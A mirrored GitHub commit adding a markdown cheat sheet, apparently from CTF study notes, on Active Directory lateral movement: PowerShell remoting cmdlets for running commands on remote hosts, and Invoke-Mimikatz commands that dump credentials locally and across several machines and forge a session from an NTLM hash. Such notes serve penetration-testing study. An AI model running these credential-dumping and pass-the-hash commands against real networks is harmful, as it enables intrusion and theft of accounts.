mirror of
https://github.com/AbdullahRizwan101/CTF-Writeups
synced 2024-11-10 06:34:17 +00:00
Add files via upload
This commit is contained in:
parent
394a6629aa
commit
bbf04d3fbc
1 changed files with 63 additions and 0 deletions
63
Active Directory/Lateral Movement/Lateral Movement.md
Normal file
63
Active Directory/Lateral Movement/Lateral Movement.md
Normal file
|
@ -0,0 +1,63 @@
|
||||||
|
# Lateral Movement - Powershell Remoting
|
||||||
|
|
||||||
|
## PSSession
|
||||||
|
|
||||||
|
- Interactive
|
||||||
|
- Runs in a new process (wsmprovhost)
|
||||||
|
- Is stateful (session is tracked)
|
||||||
|
|
||||||
|
## Useful cmdlets
|
||||||
|
|
||||||
|
```
|
||||||
|
New-PSSession -ComputerName computername.domainanme
|
||||||
|
Enter-PSSession -ComputerName computername.domainanme
|
||||||
|
```
|
||||||
|
|
||||||
|
We can use `-Credential` to pass username/password
|
||||||
|
|
||||||
|
### To execute commands or scriptblocks
|
||||||
|
|
||||||
|
```
|
||||||
|
Invoke-Command -Scriptblock {Get-Process} -ComputerName (Get-Content <list_of_servers>)
|
||||||
|
|
||||||
|
Invoke-Command -Scriptblock {whoami;hostname} -ComputerName computername.domainname
|
||||||
|
|
||||||
|
|
||||||
|
```
|
||||||
|
|
||||||
|
### To execute scripts from files
|
||||||
|
|
||||||
|
```
|
||||||
|
Invoke-Command -FilePath C:\path\to\Get-PassHashes.ps1 -ComputerName (Get-Content <list_of_server>)
|
||||||
|
```
|
||||||
|
|
||||||
|
### Execute `Stateful` commands
|
||||||
|
|
||||||
|
```
|
||||||
|
$Sess = New-PSSession -ComputerName computername
|
||||||
|
|
||||||
|
Invoke-Command -Session $Sess -ScriptBlock {$Proc = Get-Process}
|
||||||
|
|
||||||
|
```
|
||||||
|
|
||||||
|
## Mimikatz Powershell
|
||||||
|
Powershell script for mimikatz is used for dumping credentials ,tickets without dropping mimikatz exe to disk . It is used for passing , replaying hashes. Hashes can only be dumped with administrative privilieges
|
||||||
|
|
||||||
|
### Dump credentials on local machine
|
||||||
|
|
||||||
|
```
|
||||||
|
Invoke-Mimikatz -DumpCreds
|
||||||
|
```
|
||||||
|
|
||||||
|
### Dump credentials on multiple remote machines
|
||||||
|
|
||||||
|
```
|
||||||
|
Invoke-Mimikatz -DumpCreds -ComputerName @("computer1","computer2")
|
||||||
|
```
|
||||||
|
|
||||||
|
### Generate tokens from hashes
|
||||||
|
|
||||||
|
```
|
||||||
|
Invoke-Mimikatz -Command '"sekurlsa::pth /user:Administrator /domain:computername.domain.name /ntlm:ntlmhash /run:powershell.exe"'
|
||||||
|
```
|
||||||
|
|
Loading…
Reference in a new issue